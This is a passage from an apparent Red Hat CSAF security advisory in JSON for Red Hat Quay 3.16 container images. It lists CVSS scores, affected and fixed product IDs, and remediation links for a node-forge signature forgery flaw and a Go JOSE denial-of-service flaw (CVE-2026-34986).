            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"
    },
    {
      "cve": "CVE-2026-34986",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-06T17:01:34.639203+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2455470"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "RHBZ#2455470",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
          "url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
          "url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
        }
      ],
      "release_date": "2026-04-06T16:22:45.353000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
    },
    {
      "cve": "CVE-2026-39892",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-08T22:00:59.416053+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
